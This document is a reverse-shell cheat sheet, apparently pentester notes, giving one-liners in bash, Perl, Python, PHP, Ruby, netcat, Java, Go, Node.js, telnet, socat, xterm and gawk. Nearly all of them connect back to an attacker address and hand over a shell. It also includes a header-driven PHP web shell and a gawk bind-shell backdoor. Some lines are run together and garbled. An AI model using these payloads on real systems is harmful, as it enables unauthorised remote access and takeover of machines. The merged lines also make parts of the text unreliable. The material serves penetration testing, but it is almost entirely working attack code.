Reverse Shells
Mostly from PentestMonkey and HighOn.Coffee
Bash
Some versions of bash can send you a reverse shell:
bash -i >& /dev/tcp/10.9.10.123/1234 0>&1exec /bin/bash 0&0 2>&00<&196;exec 196<>/dev/tcp/10.9.10.123/1234; sh <&196 >&196 2>&196exec 5<>/dev/tcp/10.9.10.123/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; donePERL
perl -e 'use Socket;$i="10.9.10.123";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Perl Windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.9.10.123:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="10.9.10.123";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Python
Works with python 2 or 3; substitute ‘python3’ if necessary
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.10.123",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'PHP
This code assumes that the TCP connection uses file descriptor 3. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");'<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"10.9.10.123"/1234 0>&1'");?>Base64 encrypted by @0xInfection:
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);Ruby
ruby -rsocket -e'f=TCPSocket.open("10.9.10.123",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Netcat
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.9.10.123 1234This one is gold:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f/bin/sh | nc 10.9.10.123 80OpenBSD netcat
mkfifo /tmp/lol;nc ATTACKER-IP PORT 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lolJava
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.9.10.123/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.9.10.123) on TCP port 6001.
xterm -display 10.9.10.123:1To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetipsocat
socat tcp:ip:port exec:'bash -i' ,pty,stderr,setsid,sigint,sane &Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.9.10.123:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;http://cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.goNode.js
require('child_process').exec('bash -i >& /dev/tcp/10.9.10.123/80 0>&1');Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet 10.9.10.123 80 0/tmp/ptelnet 10.9.10.123 80 | /bin/bash | telnet 10.9.10.123 443Remember to listen on 443 on the attacking machine also.
Gawk
gawk 'BEGIN {P=4444;S="> ";H="10.9.10.123";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}'#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}